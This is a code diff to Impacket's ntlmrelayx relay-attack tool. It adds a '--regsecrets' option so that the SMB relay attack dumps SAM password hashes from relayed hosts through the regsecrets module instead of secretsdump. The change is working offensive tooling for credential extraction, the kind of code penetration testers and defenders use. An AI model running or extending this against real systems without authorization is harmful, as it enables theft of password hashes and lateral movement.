Feat: Added support of regsecrets for SAM dump as an automated attack in ntlmrelayx

examples/ntlmrelayx.py

@@ -185,6 +185,7 @@ def start_servers(options, threads):
         c.setTargets(targetSystem)
         c.setExeFile(options.e)
         c.setCommand(options.c)
+        c.setRegSecrets(options.regsecrets)
         c.setEnumLocalAdmins(options.enum_local_admins)
         c.setAddComputerSMB(options.add_computer)
         c.setDisableMulti(options.no_multirelay)
@@ -358,6 +359,7 @@ def stop_servers(threads):
                                      'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
     smboptions.add_argument('--rpc-attack', action='store', choices=[None, "TSCH", "ICPR"], required=False, default=None, help='Select the attack to perform over RPC over named pipes.')
+    smboptions.add_argument('--regsecrets', action='store_true', required=False, help='Do SAM dump with regsecrets instead of secretsdump.')
 
     #RPC arguments
     rpcoptions = parser.add_argument_group("RPC client options")
@@ -451,6 +453,10 @@ def stop_servers(threads):
     if options.rpc_use_smb and not options.auth_smb:
        logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
        sys.exit(1)
+
+    if options.regsecrets and options.c:
+       logging.error("SAM dump with regsecrets is not compatible with executing a command")
+       sys.exit(1) 
 
     # Ensuring the correct target is set when performing SCCM policies attack
     if options.sccm_policies is True and not options.target.rstrip('/').endswith("/ccm_system_windowsauth/request"):

impacket/examples/ntlmrelayx/attacks/smbattack.py

@@ -157,7 +157,11 @@ def run(self):
                     LOG.error(str(e))
 
             else:
-                from impacket.examples.secretsdump import RemoteOperations, SAMHashes
+                if (self.config.regSecrets):
+                    from impacket.examples.regsecrets import RemoteOperations, SAMHashes
+                else:
+                    from impacket.examples.secretsdump import RemoteOperations, SAMHashes
+
                 from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
                 samHashes = None
                 try:
@@ -197,15 +201,20 @@ def run(self):
                     else:
                         bootKey = remoteOps.getBootKey()
                         remoteOps._RemoteOperations__serviceDeleted = True
-                        samFileName = remoteOps.saveSAM()
-                        samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
+                        if (self.config.regSecrets):
+                            LOG.debug("Dumping SAM with regsecrets")
+                            samHashes = SAMHashes(bootKey, remoteOps = remoteOps)
+                        else:
+                            LOG.debug("Dumping SAM with secretsdump")
+                            samFileName = remoteOps.saveSAM()
+                            samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
                         samHashes.dump()
                         samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
                         LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
                 except Exception as e:
                     LOG.error(str(e))
                 finally:
-                    if samHashes is not None:
+                    if (not self.config.regSecrets) and (samHashes is not None):
                         samHashes.finish()
                     if remoteOps is not None:
                         remoteOps.finish()

impacket/examples/ntlmrelayx/utils/config.py

@@ -62,6 +62,7 @@ def __init__(self):
         self.enumLocalAdmins = False
         self.SMBServerChallenge = None
         self.rpc_attack = None
+        self.regSecrets = False
 
         # RPC options
         self.rpc_mode = None
@@ -150,6 +151,9 @@ def setExeFile(self, filename):
 
     def setCommand(self, command):
         self.command = command
+
+    def setRegSecrets(self, regSecrets):
+        self.regSecrets = regSecrets
 
     def setEnumLocalAdmins(self, enumLocalAdmins):
         self.enumLocalAdmins = enumLocalAdmins